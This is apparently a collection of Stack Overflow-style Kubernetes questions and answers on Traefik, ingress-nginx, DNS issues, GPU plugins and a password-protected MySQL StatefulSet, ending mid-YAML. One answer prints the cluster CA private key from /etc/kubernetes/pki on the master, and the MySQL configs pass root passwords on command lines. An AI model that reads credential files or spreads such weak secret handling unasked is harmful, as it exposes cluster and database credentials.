| <p>Monitoring over time and per Pod yes, there's suggestions at <a href="https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/" rel="nofollow noreferrer">https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/</a> One of the more popular is the Prometheus-Grafana combination - <a href="https://grafana.com/dashboards/315" rel="nofollow noreferrer">https://grafana.com/dashboards/315</a></p>
<p>As for automatic suggestion of the request and limits, I don't think there is anything. Keep in mind Kubernetes already tries to balance giving each Pod what it needs without it taking too much. The limits and requests that you set are to help it do this more safely. There are limitations on automatically inference as an under-resourced Pod can still work but respond a bit slower - it is up to you to decide what level of slowness you would tolerate. It is also up to you to decide what level of resource consumption could be acceptable in peak load, as opposed to excessive consumption that might indicate a bug in your app or even an attack. There's a further limitation as the metric units are themselves an attempt to approximate resource power that can actually vary with types of hardware (memory and CPUs can differ in mode of operation as well as quantity) and so can vary across clusters or even nodes on a cluster if the hardware isn't all equal. </p>
<p>What you are doing with top seems to me a good way to get started. You'll want to monitor resource usage for the cluster anyway so keeping track of this and adjusting limits as you go is a good idea. If you can run the same app outside of kubernetes and read around to see what other apps using the same language do then that can help to indicate if there's anything you can do to improve utilisation (memory consumption on the JVM in containers for example famously requires some tweaking to get right). </p>
|
<p>I created ConfigMap using kubectl and I can also see it using:</p>
<pre><code>kubectl get cm
</code></pre>
<p>I am just curious where kubernetes stores this data/information within the cluster? Does it store in etc? How do I view it, if it stored in etcd?</p>
<p>Does it store in any file/folder location or anywhere else?</p>
<p>I mean where kubernetes stores it internally?</p>
| <p>Yes etcd is used for storing ConfigMaps and other resources you deploy to the cluster. See <a href="https://matthewpalmer.net/kubernetes-app-developer/articles/how-does-kubernetes-use-etcd.html" rel="noreferrer">https://matthewpalmer.net/kubernetes-app-developer/articles/how-does-kubernetes-use-etcd.html</a> and note <a href="https://github.com/kubernetes/kubernetes/issues/19781#issuecomment-172553264" rel="noreferrer">https://github.com/kubernetes/kubernetes/issues/19781#issuecomment-172553264</a> </p>
<p>You view the content of the configmap with 'kubectl get cm -oyaml' i.e. through the k8s API directly as illustrated in <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/" rel="noreferrer">https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/</a> You don't need to look inside etcd to see the content of a configmap. </p>
|
<p>In kubenetes what are advantages and disadvantages using single shared pvc for all pod & multiple pvc for each pod.</p>
| <p><code>Statefulset with single PV/PVC</code> and <code>Statefulset with multiple PV/PVC</code> has different use cases and should be used according to the application you want to deploy. You can not precede one over another.</p>
<p>Let me explain you with example of databases, if you want to deploy the <code>relational database</code> like <code>postgresql</code> where all the data stored at one place. You need statefulset with single PV/PVC and all replicas to that write to that particular volume only. This is the only way to keep the data consistent in postgresql.</p>
<p>Now lets say you want to deploy a <code>distributed nosql database</code> like <code>cassandra/mongodb</code>, where the data is splitted along the different machines and cluster of database. In such databases, data is replicated over different nodes and in that case statefulsets pods acts as a different node of that database. So, such pods needs different volume to store their data. Hence if you're running cassandra statefulset with 3 pods, those pods must have different PV/PVC attached to them. Each node writes data on its own PV and which ultimately replicated to other nodes. </p>
|
<p>I have a new kubernetes cluster, I installed Traefik v1.7.6 on it and enabled Traefik dashboard which is working fine.</p>
<p>Now I want to add basic auth on the ingress service of traefik dashboard, I followed <a href="https://docs.traefik.io/user-guide/kubernetes/#basic-authentication" rel="nofollow noreferrer">docs</a> : </p>
<ul>
<li>created a secret called <code>auth-traefik</code> from htpasswd generated file in same namespace as Traefik</li>
<li><p>added following annotations to ingress dashboard:</p>
<pre><code>kubernetes.io/ingress.class: traefik
traefik.ingress.kubernetes.io/auth-secret: auth-traefik
traefik.ingress.kubernetes.io/auth-type: basic
</code></pre></li>
</ul>
<p>I can't access the dashboard anymore and got the following page: <code>502 Bad Gateway nginx/1.13.12</code></p>
<p>I restarted traefik pod and there is the following log : </p>
<pre><code>*{"level":"error","msg":"Failed to retrieve auth configuration for ingress kube-system/traefik-dashboard: failed to load auth credentials: secret \"kube-system\"/\"auth-traefik\" not found","time":"2018-12-26T23:45:59Z"}*
</code></pre>
<p>More details: Ubuntu 18.04 running on a x64 <a href="https://www.scaleway.com" rel="nofollow noreferrer">Scaleway</a> server. I tried a regular & MicroK8s installation, both have the same issue (I'm going on with the MicroK8s one, for now).</p>
<p>Traefik was installed through the latest Helm package (with default values, I only enabled the dashboard)</p>
| <p>Looks like you might have created the <code>auth-traefik</code> Kubernetes secret on a different namespace from <code>kube-system</code> where it's looking for it. (Looks like the <code>Ingress</code> is defined in the <code>kube-system</code> namespace).</p>
<p>You can check with:</p>
<pre><code>$ kubectl -n kube-system get secret auth-traefik -o=yaml
</code></pre>
<p>If it's not there (is it in a different namespace? monitoring? default?), then you can create it:</p>
<pre><code>$ kubectl create secret generic auth-traefik --from-file auth --namespace=kube-system
</code></pre>
<p>Or the <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/" rel="nofollow noreferrer">ServiceAccount</a> that your Traefik pod is using doesn't have <a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/" rel="nofollow noreferrer">RBAC</a> access to the <a href="https://kubernetes.io/docs/concepts/configuration/secret/" rel="nofollow noreferrer">Secrets</a> resource in the `kube-system namespace.</p>
|
<p>I am not able to curl/wget any URL with https. They're all giving connection refused errors. Here's what I've observed so far:</p>
<ol>
<li><p>When I curl any URL with https from any pod, the domain gets resolved to the different IP address than the intended one. I verified this with <code>dig domainname</code> and <code>curl</code>ing the same domainname. Both IP's were different</p></li>
<li><p>For debugging purpose, I tried the same scenario from a kubelet docker container and it worked. But if I tried the same from another app container, it fails.</p></li>
</ol>
<p>Any idea what might be wrong? I am sure, there is some issue with networking. Any more steps for debugging?</p>
<p>The cluster is setup with RKE on bare-metal which uses canal for networking.</p>
<p>The website I am trying to curl is updates.jenkins.io and here's the nslookup output</p>
<pre><code>bash-4.4# nslookup updates.jenkins.io
Server: 10.43.0.10
Address: 10.43.0.10#53
Non-authoritative answer:
updates.jenkins.io.domain.name canonical name = io.domain.name.
Name: io.domain.name
Address: 185.82.212.199
</code></pre>
<p>And nslookup from the node gives</p>
<pre><code>root@n4:/home# nslookup updates.jenkins.io
Server: 127.0.1.1
Address: 127.0.1.1#53
Non-authoritative answer:
updates.jenkins.io canonical name = mirrors.jenkins.io.
Name: mirrors.jenkins.io
Address: 52.202.51.185
</code></pre>
<p>As far as I can see, it is trying to connect to io.domain.name and not updates.jenkins.io.</p>
<p>Further inspection, all domains ending with .io are causing the issue. Here'a another one:</p>
<pre><code>bash-4.4# nslookup test.io
Server: 10.43.0.10
Address: 10.43.0.10#53
Non-authoritative answer:
test.io.domain.name canonical name = io.domain.name.
Name: io.domain.name
Address: 185.82.212.199
</code></pre>
| <p>Well, there was some issue with <code>/etc/resolv.conf</code>. It was missing the correct nameserver entry. Once that was resolved, and the system components were restarted, everything was working.</p>
|
<p>I have something like this:</p>
<pre><code> POD-1
|
-------------------------
?|? ?|? ?|?
service-1 service-2 service-3
</code></pre>
<p>How do I communicate from a server inside a pod, to other servers in pods behind services?</p>
| <p>You need to have services for the pod that you want to access. You can just use internal endpoints of the corresponding services of the pod. </p>
<p>As example let's think there is a <code>mysql</code> pod and service corresponding to it as <code>mysql-svc</code> of type ClusterIP exposing port 3306 as below. </p>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: mysql-svc
spec:
ports:
- name: db-port
protocol: "TCP"
port: 3306
targetPort: 3306
selector:
app: mysql
</code></pre>
<p>And there is a separate pod of python application which uses that mysql. yo can access that mysql server inside pod using <code>mysql://mysql-svc:3306/dbName</code> which is the internal endpoint of <code>mysql-svc</code></p>
<p>And if your pods are in two different namespaces (mysql in <code>dev</code> namespace and python app in <code>qa</code> namespace) you can use <code>mysql-svc.dev.svc.cluster.local</code> instead.</p>
|
<p>I create my docker (python flask).</p>
<p>How can I calculate what is the limit to put for memory and CPU?</p>
<p>Do we have some tools that run performance tests on docker with different limitation and then advise what is the best limitation numbers to put?</p>
| <p>With an application already running inside of a container, you can use <code>docker stats</code> to see the current utilization of CPU and memory. While there it little harm in setting CPU limits too low (it will just slow down the app, but it will still run), be careful to keep memory limits above the worst case scenario. When apps attempt to exceed their memory limit, they will be killed and usually restarted by a restart policy/orchestration tool. If the limit is set too low, you may find your app in a restart loop.</p>
|
<p>Here is a sample WebSocket app that I'm trying to get it to work from a Kubernetes ingress-nginx controller.</p>
<p>Kubernetes yaml:</p>
<pre><code>echo "
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: ws-example
spec:
replicas: 1
template:
metadata:
labels:
app: wseg
spec:
containers:
- name: websocketexample
image: nicksardo/websocketexample
imagePullPolicy: Always
ports:
- name: http
containerPort: 8080
env:
- name: podname
valueFrom:
fieldRef:
fieldPath: metadata.name
---
apiVersion: v1
kind: Service
metadata:
name: ws-example-svc
labels:
app: wseg
spec:
type: NodePort
ports:
- port: 80
targetPort: 8080
protocol: TCP
selector:
app: wseg
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: ws-example-svc
annotations:
kubernetes.io/ingress.class: nginx
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myhostname.com
http:
paths:
- backend:
serviceName: ws-example-svc
servicePort: 80
path: /somecontext
" | kubectl create -f -
</code></pre>
<p>I get this error:</p>
<pre><code>WebSocket connection to 'ws://myhostname.com/somecontext/ws?encoding=text' failed: Error during WebSocket handshake: Unexpected response code: 400
</code></pre>
<p>When I try to connect using a WebSocket client web page like this <a href="http://www.websocket.org/echo.html" rel="noreferrer">http://www.websocket.org/echo.html</a></p>
<p>The version of ingress-nginx is 0.14.0. This version supports WebSockets.</p>
<hr>
<p>Update, I'm able to directly access the websocket running pod, when I port-forward from my localhost to pod's port.</p>
<pre><code>[rpalaniappan@sdgl15280a331:~/git/zalenium] $ kubectl get pods -l app=wseg
NAME READY STATUS RESTARTS AGE
ws-example-5dddb98cfb-vmdt5 1/1 Running 0 5h
[rpalaniappan@sdgl15280a331:~/git/zalenium] $ kubectl port-forward ws-example-5dddb98cfb-vmdt5 8080:8080
Forwarding from 127.0.0.1:8080 -> 8080
Forwarding from [::1]:8080 -> 8080
Handling connection for 8080
</code></pre>
<hr>
<pre><code>[rpalaniappan@sdgl15280a331:~/git/zalenium] $ wscat -c ws://localhost:8080/ws
connected (press CTRL+C to quit)
< Connected to ws-example-5dddb98cfb-vmdt5
> hi
< hi
< ws-example-5dddb98cfb-vmdt5 reports time: 2018-12-28 01:19:00.788098266 +0000 UTC
</code></pre>
| <p>So basically this:</p>
<pre><code>nginx.ingress.kubernetes.io/rewrite-target: /
</code></pre>
<p>is stripping the <code>/ws</code> from the request (combined with <code>path: /ws</code>) that gets sent to the backend everytime your browser tries to issue a WebSocket connection request. The backend expects <code>/ws</code> when it receives a connection request.</p>
<p>If you specify <code>path: /mypath</code> and <code>/mypath/*</code> it works (works for me):</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: ws-example-svc
annotations:
kubernetes.io/ingress.class: nginx
nginx.ingress.kubernetes.io/rewrite-target: /
spec:
rules:
- host: myhostname.com
http:
paths:
- backend:
serviceName: ws-example-svc
servicePort: 80
path: /mypath
- backend:
serviceName: ws-example-svc
servicePort: 80
path: /mypath/*
</code></pre>
|
<p>export K8s cluster CA cert and CA private key</p>
<p>Team, I have a Kubernetes cluster running. I will be deleting and creating it again and again so I want to reuse the same CA cert all the time for which I need to save the CA cert and key to create secret as below </p>
<pre><code>create secret keypair ca --cert ${CACRT} --key ${CAKEY} --name ${NAME}
</code></pre>
<p>Need path to the cert and key and also kops command to export them.</p>
| <p>I'm not really sure what you are trying to accomplish with the <code>create secret keypair ca...</code> command, but you can get these right out of one of the Kubernetes masters (or master if you have one).</p>
<pre><code>$ ssh user@kubernetesmaster
</code></pre>
<p>Then:</p>
<pre><code>$ cat /etc/kubernetes/pki/ca.crt
...
$ cat /etc/kubernetes/pki/ca.key
</code></pre>
<p>Note that <code>etcd</code> usually uses a different CA. You can find it under:</p>
<pre><code>/etc/kubernetes/pki/etcd
</code></pre>
|
<p>I’m trying to scheduling GPU in Kubernetes v1.13.1 and I followed the guide in <a href="https://kubernetes.io/docs/tasks/manage-gpus/scheduling-gpus/#deploying-nvidia-gpu-device-plugin" rel="nofollow noreferrer">https://kubernetes.io/docs/tasks/manage-gpus/scheduling-gpus/#deploying-nvidia-gpu-device-plugin</a></p>
<p>But the gpu resources doesn't show up when I run
<code>kubectl get nodes -o yaml</code>, according to <a href="https://stackoverflow.com/questions/49812783/scheduling-gpus-in-kubernetes-1-10">this post</a>, I checked the Nvidia gpu device plugin.</p>
<p>I run:</p>
<pre><code>kubectl create -f https://raw.githubusercontent.com/NVIDIA/k8s-device-plugin/v1.11/nvidia-device-plugin.yml
</code></pre>
<p>several times and the result is </p>
<pre><code>Error from server (AlreadyExists): error when creating "https://raw.githubusercontent.com/NVIDIA/k8s-device-plugin/v1.11/nvidia-device-plugin.yml": daemonsets.extensions "nvidia-device-plugin-daemonset" already exists
</code></pre>
<p>It seems that I have installed the NVIDIA Device Plugin? But the result of <code>kubectl get pods --all-namespaces</code> is </p>
<pre><code>NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system calico-node-qdhvd 2/2 Running 0 65m
kube-system coredns-78d4cf999f-fk4wl 1/1 Running 0 68m
kube-system coredns-78d4cf999f-zgfvl 1/1 Running 0 68m
kube-system etcd-liuqin01 1/1 Running 0 67m
kube-system kube-apiserver-liuqin01 1/1 Running 0 67m
kube-system kube-controller-manager-liuqin01 1/1 Running 0 67m
kube-system kube-proxy-l8p9p 1/1 Running 0 68m
kube-system kube-scheduler-liuqin01 1/1 Running 0 67m
</code></pre>
<p>When I run <code>kubectl describe node</code>, gpu is not in the the allocatable resource</p>
<pre><code>Non-terminated Pods: (9 in total)
Namespace Name CPU Requests CPU Limits Memory Requests Memory Limits AGE
--------- ---- ----------- - ---------- --------------- ------------- ---
kube-system calico-node-qdhvd 250m (2%) 0 (0%) 0 (0%) 0 (0%) 18h
kube-system coredns-78d4cf999f-fk4wl 100m (0%) 0 (0%) 70Mi (0%) 170Mi (1%) 19h
kube-system coredns-78d4cf999f-zgfvl 100m (0%) 0 (0%) 70Mi (0%) 170Mi (1%) 19h
kube-system etcd-liuqin01 0 (0%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-apiserver-liuqin01 250m (2%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-controller-manager-liuqin01 200m (1%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-proxy-l8p9p 0 (0%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system kube-scheduler-liuqin01 100m (0%) 0 (0%) 0 (0%) 0 (0%) 19h
kube-system nvidia-device-plugin-daemonset-p78wz 0 (0%) 0 (0%) 0 (0%) 0 (0%) 26m
Allocated resources:
(Total limits may be over 100 percent, i.e., overcommitted.)
Resource Requests Limits
-------- -------- ------
cpu 1 (8%) 0 (0%)
memory 140Mi (0%) 340Mi (2%)
ephemeral-storage 0 (0%) 0 (0%)
</code></pre>
| <p>As <a href="https://stackoverflow.com/users/5850603/lianyoucat">lianyouCat</a> mentioned in the comments:</p>
<blockquote>
<p>After installing nvidia-docker2, the default runtime of docker should be modified to nvidia docker as <a href="https://github.com/NVIDIA/k8s-device-plugin#preparing-your-gpu-nodes" rel="nofollow noreferrer">github.com/NVIDIA/k8s-device-plugin#preparing-your-gpu-nodes</a>.</p>
<p>After modifying the <code>/etc/docker/daemon.json</code>, you need to restart docker so that the configuration works.</p>
</blockquote>
|
<p>I have added a security context in my pod which looks as follows:</p>
<pre><code>spec:
securityContext:
runAsNonRoot: true
</code></pre>
<p>While running the pod I am getting error message (kubectl get pod pod-name -o=yaml):</p>
<blockquote>
<p>container has runAsNonRoot and image has non-numeric user (default),
cannot verify user is non-root</p>
</blockquote>
<p>The message is intuitive but, after reading this <a href="https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment/" rel="noreferrer">kubernetes blog</a> it seems to me it should be very straight forward, what I am missing here?</p>
| <p>This error comes only when your uid == nil,. Based on the error text, we need to set a numeric user value.</p>
<p>So, for the user with UID=1000 you can do it in your pod definition like:</p>
<pre><code>securityContext:
runAsUser: 1000
</code></pre>
<p>So your <code>securityContext</code> should be like:</p>
<pre><code>securityContext:
fsGroup: 2000
runAsNonRoot: true
runAsUser: 1000
</code></pre>
<p>Checkout it in official docs <a href="https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-the-security-context-for-a-pod" rel="noreferrer">here</a></p>
|
<p>I followed the example in here <a href="https://kubernetes.io/docs/tasks/run-application/run-replicated-stateful-application/" rel="noreferrer">https://kubernetes.io/docs/tasks/run-application/run-replicated-stateful-application/</a> to create a 3 replica mysql statefulset in kubernetes and everything works fine.</p>
<p>However, after I added root password, and modified the deploy yaml to include the password, mysql-1 always fail.</p>
<p>Here is how I add the password:</p>
<ol>
<li>I create a secret <code>mysql-root-pass</code></li>
<li>I remove the <code>MYSQL_ALLOW_EMPTY_PASSWORD</code> and replace it with <code>MYSQL_ROOT_PASSWORD</code> read from the secret</li>
<li>Add <code>-p$MYSQL_ROOT_PASSWORD</code> to everywhere mysql is called in the yaml file.</li>
<li>Still, mysql-0 is created and runs, but mysql-1 crashed:</li>
</ol>
<p><code>mysql-1 0/2 Init:CrashLoopBackOff</code></p>
<p>Anyone has a working example on how to add password?</p>
<h2>Edit: Add yaml file</h2>
<pre><code>apiVersion: apps/v1
kind: StatefulSet
metadata:
name: mysql
labels:
app: mysql
spec:
selector:
matchLabels:
app: mysql
serviceName: mysql
replicas: 3
template:
metadata:
labels:
app: mysql
spec:
initContainers:
- name: init-mysql
image: mysql:5.7
command:
# initContainer is used to setup config according to config-map
- bash
- "-c"
- |
set -ex
# Generate mysql server-id from pod ordinal index.
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
echo [mysqld] > /mnt/conf.d/server-id.cnf
# Add an offset to avoid reserved server-id=0 value.
echo server-id=$((100 + $ordinal)) >> /mnt/conf.d/server-id.cnf
# Copy appropriate conf.d files from config-map to emptyDir.
if [[ $ordinal -eq 0 ]]; then
cp /mnt/config-map/master.cnf /mnt/conf.d/
else
cp /mnt/config-map/slave.cnf /mnt/conf.d/
fi
volumeMounts:
- name: conf
mountPath: /mnt/conf.d
- name: config-map
mountPath: /mnt/config-map
- name: clone-mysql
image: gcr.io/google-samples/xtrabackup:1.0
command:
- bash
- "-c"
- |
set -ex
# Skip the clone if data already exists.
[[ -d /var/lib/mysql/mysql ]] && exit 0
# Skip the clone on master (ordinal index 0).
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
[[ $ordinal -eq 0 ]] && exit 0
# Clone data from previous peer.
ncat --recv-only mysql-$(($ordinal-1)).mysql 3307 | xbstream -x -C /var/lib/mysql
# Prepare the backup.
xtrabackup --prepare --user=root --password=$MYSQL_ROOT_PASSWORD --target-dir=/var/lib/mysql
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
containers:
- name: mysql
image: mysql:5.7
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-root-pass
key: password
ports:
- name: mysql
containerPort: 3306
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 500m
memory: 1Gi
livenessProbe:
exec:
command:
- bash
- "-c"
- |
set -ex
mysqladmin -p$MYSQL_ROOT_PASSWORD ping &> /dev/null
initialDelaySeconds: 30
periodSeconds: 10
timeoutSeconds: 5
readinessProbe:
exec:
# Check we can execute queries over TCP (skip-networking is off).
command:
- bash
- "-c"
- |
set -ex
mysql -h 127.0.0.1 -p$MYSQL_ROOT_PASSWORD -e "SELECT 1" &> /dev/null
initialDelaySeconds: 5
periodSeconds: 2
timeoutSeconds: 1
- name: xtrabackup
image: gcr.io/google-samples/xtrabackup:1.0
ports:
- name: xtrabackup
containerPort: 3307
command:
- bash
- "-c"
- |
set -ex
cd /var/lib/mysql
# Determine binlog position of cloned data, if any.
if [[ -f xtrabackup_slave_info ]]; then
# XtraBackup already generated a partial "CHANGE MASTER TO" query
# because we're cloning from an existing slave.
mv xtrabackup_slave_info change_master_to.sql.in
# Ignore xtrabackup_binlog_info in this case (it's useless).
rm -f xtrabackup_binlog_info
elif [[ -f xtrabackup_binlog_info ]]; then
# We're cloning directly from master. Parse binlog position.
[[ `cat xtrabackup_binlog_info` =~ ^(.*?)[[:space:]]+(.*?)$ ]] || exit 1
rm xtrabackup_binlog_info
echo "CHANGE MASTER TO MASTER_LOG_FILE='${BASH_REMATCH[1]}',\
MASTER_LOG_POS=${BASH_REMATCH[2]}" > change_master_to.sql.in
fi
# Check if we need to complete a clone by starting replication.
if [[ -f change_master_to.sql.in ]]; then
echo "Waiting for mysqld to be ready (accepting connections)"
until mysql -h 127.0.0.1 -p$MYSQL_ROOT_PASSWORD -e "SELECT 1"; do sleep 1; done
echo "Initializing replication from clone position"
# In case of container restart, attempt this at-most-once.
mv change_master_to.sql.in change_master_to.sql.orig
mysql -h 127.0.0.1 -p$MYSQL_ROOT_PASSWORD <<EOF
$(<change_master_to.sql.orig),
MASTER_HOST='mysql-0.mysql',
MASTER_USER='root',
MASTER_PASSWORD='',
MASTER_CONNECT_RETRY=10;
START SLAVE;
EOF
fi
# Start a server to send backups when requested by peers.
exec ncat --listen --keep-open --send-only --max-conns=1 3307 -c \
"xtrabackup --backup --slave-info --stream=xbstream --host=127.0.0.1 --user=root"
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 100m
memory: 100Mi
volumes:
- name: conf
emptyDir: {}
- name: config-map
configMap:
name: mysql
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes: ["ReadWriteOnce"]
storageClassName: dynamic-nfs
resources:
requests:
storage: 10Gi
</code></pre>
| <p>The answer provided by Nicola Ben is close, but there were a few mistakes in the StatefulSet declaration.</p>
<p>The main problem is that the environment variable is declared in the mysql image but not in the xtrabackup where it is also referenced. Secondly the START SLAVE and xtrabackup commands should take the user and password as well.</p>
<p>Here is a working version of the StatefulSet yaml declaration:</p>
<hr>
<pre><code>apiVersion: apps/v1
kind: StatefulSet
metadata:
name: mysql
spec:
selector:
matchLabels:
app: mysql
serviceName: mysql
replicas: 2
template:
metadata:
labels:
app: mysql
spec:
initContainers:
- name: init-mysql
image: mysql:5.7
command:
- bash
- "-c"
- |
set -ex
# Generate mysql server-id from pod ordinal index.
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
echo [mysqld] > /mnt/conf.d/server-id.cnf
# Add an offset to avoid reserved server-id=0 value.
echo server-id=$((100 + $ordinal)) >> /mnt/conf.d/server-id.cnf
# Copy appropriate conf.d files from config-map to emptyDir.
if [[ $ordinal -eq 0 ]]; then
cp /mnt/config-map/master.cnf /mnt/conf.d/
else
cp /mnt/config-map/slave.cnf /mnt/conf.d/
fi
volumeMounts:
- name: conf
mountPath: /mnt/conf.d
- name: config-map
mountPath: /mnt/config-map
- name: clone-mysql
image: gcr.io/google-samples/xtrabackup:1.0
command:
- bash
- "-c"
- |
set -ex
# Skip the clone if data already exists.
[[ -d /var/lib/mysql/mysql ]] && exit 0
# Skip the clone on master (ordinal index 0).
[[ `hostname` =~ -([0-9]+)$ ]] || exit 1
ordinal=${BASH_REMATCH[1]}
[[ $ordinal -eq 0 ]] && exit 0
# Clone data from previous peer.
ncat --recv-only mysql-$(($ordinal-1)).mysql 3307 | xbstream -x -C /var/lib/mysql
# Prepare the backup.
xtrabackup --prepare --target-dir=/var/lib/mysql
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
containers:
- name: mysql
image: mysql:5.7
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-pass-root
key: password
- name: MYSQL_USER
value: server
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-pass-user
key: password
- name: MYSQL_DATABASE
value: medlor
ports:
- name: mysql
containerPort: 3306
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 500m
memory: 1Gi
livenessProbe:
exec:
command: ["mysqladmin", "-uroot", "-p$MYSQL_ROOT_PASSWORD", "ping"]
initialDelaySeconds: 30
periodSeconds: 10
timeoutSeconds: 5
readinessProbe:
exec:
# Check we can execute queries over TCP (skip-networking is off).
command:
- /bin/sh
- -ec
- >-
mysql -h127.0.0.1 -uroot -p$MYSQL_ROOT_PASSWORD -e'SELECT 1'
initialDelaySeconds: 5
periodSeconds: 2
timeoutSeconds: 1
- name: xtrabackup
image: gcr.io/google-samples/xtrabackup:1.0
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: mysql-pass-root
key: password
ports:
- name: xtrabackup
containerPort: 3307
command:
- bash
- "-c"
- |
set -ex
cd /var/lib/mysql
# Determine binlog position of cloned data, if any.
if [[ -f xtrabackup_slave_info ]]; then
# XtraBackup already generated a partial "CHANGE MASTER TO" query
# because we're cloning from an existing slave.
mv xtrabackup_slave_info change_master_to.sql.in
# Ignore xtrabackup_binlog_info in this case (it's useless).
rm -f xtrabackup_binlog_info
elif [[ -f xtrabackup_binlog_info ]]; then
# We're cloning directly from master. Parse binlog position.
[[ `cat xtrabackup_binlog_info` =~ ^(.*?)[[:space:]]+(.*?)$ ]] || exit 1
rm xtrabackup_binlog_info
echo "CHANGE MASTER TO MASTER_LOG_FILE='${BASH_REMATCH[1]}',\
MASTER_LOG_POS=${BASH_REMATCH[2]}" > change_master_to.sql.in
fi
# Check if we need to complete a clone by starting replication.
if [[ -f change_master_to.sql.in ]]; then
echo "Waiting for mysqld to be ready (accepting connections)"
until mysql -h 127.0.0.1 -uroot -p$MYSQL_ROOT_PASSWORD -e "SELECT 1"; do sleep 1; done
echo "Initializing replication from clone position"
# In case of container restart, attempt this at-most-once.
mv change_master_to.sql.in change_master_to.sql.orig
mysql -h 127.0.0.1 -uroot -p$MYSQL_ROOT_PASSWORD <<EOF
$(<change_master_to.sql.orig),
MASTER_HOST='mysql-0.mysql',
MASTER_USER='root',
MASTER_PASSWORD='$MYSQL_ROOT_PASSWORD',
MASTER_CONNECT_RETRY=10;
START SLAVE USER='root' PASSWORD='$MYSQL_ROOT_PASSWORD';
EOF
fi
# Start a server to send backups when requested by peers.
exec ncat --listen --keep-open --send-only --max-conns=1 3307 -c \
"xtrabackup --backup --slave-info --stream=xbstream --host=127.0.0.1 --user=root --password=$MYSQL_ROOT_PASSWORD"
volumeMounts:
- name: data
mountPath: /var/lib/mysql
subPath: mysql
- name: conf
mountPath: /etc/mysql/conf.d
resources:
requests:
cpu: 100m
memory: 100Mi
volumes:
- name: conf
emptyDir: {}
- name: config-map
configMap:
name: mysql
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 10Gi
</code></pre>
<p>I also noticed that in his file he has the replicas set to 1 which would only start the master and no slaves, so that might explain why some were getting startup failure on the slaves.</p>
|
<p>I am using traefik as ingress controller in a K8s cluster. I'd like to enforce all traffic via HTTPS.</p>
<p>It is a bit confusing the documentation because apparently there are different ways to do the same thing? Namely, I'd like to know what is the difference between these 2:</p>
<ul>
<li><a href="https://docs.traefik.io/user-guide/examples/#http-redirect-on-http" rel="nofollow noreferrer">https://docs.traefik.io/user-guide/examples/#http-redirect-on-http</a></li>
<li><a href="https://docs.traefik.io/configuration/backends/kubernetes/#general-annotations" rel="nofollow noreferrer">https://docs.traefik.io/configuration/backends/kubernetes/#general-annotations</a></li>
</ul>
<p>If I use K8s is enough to use general annotations or I still have to edit the TOML file? </p>
<p>I have tried to use <code>traefik.ingress.kubernetes.io/redirect-entry-point: https</code> but doesn't find the service so I guess something is missing in my config.</p>
<p>If I remove the above line then everything works but HTTP -> HTTPS is, of course, not working. When I place the line back it returns a 404.</p>
<p>FWIW, the ingress definition is as follows (with traefik redirecting to 404): </p>
<pre><code> - apiVersion: extensions/v1beta1
kind: Ingress
metadata:
generation: 1
name: rekover-ingress
namespace: prod
annotations:
kubernetes.io/ingress.class: traefik
traefik.ingress.kubernetes.io/frontend-entry-points: http, https
traefik.ingress.kubernetes.io/redirect-entry-point: https
spec:
rules:
- host: www.xxx.com
http:
paths:
- backend:
serviceName: xxx-frontend
servicePort: 80
</code></pre>
<p>I have tried the very same configuration with nginx and changing to respective metadata and worked!. Below metadata used for nginx and Ingress:</p>
<pre><code>nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
kubernetes.io/ingress.class: nginx
</code></pre>
<p>For completeness, I copy-paste the service definition for both nginx and traefik. First one works as expected:</p>
<pre><code>kind: Service
apiVersion: v1
metadata:
name: ingress-nginx
namespace: ingress-nginx
labels:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
annotations:
service.beta.kubernetes.io/aws-load-balancer-backend-protocol: http
service.beta.kubernetes.io/aws-load-balancer-ssl-cert: arn:aws:acm:xxxx
service.beta.kubernetes.io/aws-load-balancer-ssl-ports: https
spec:
selector:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
ports:
- name: http
port: 80
targetPort: http
- name: https
port: 443
targetPort: http
type: LoadBalancer
</code>
<code>
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
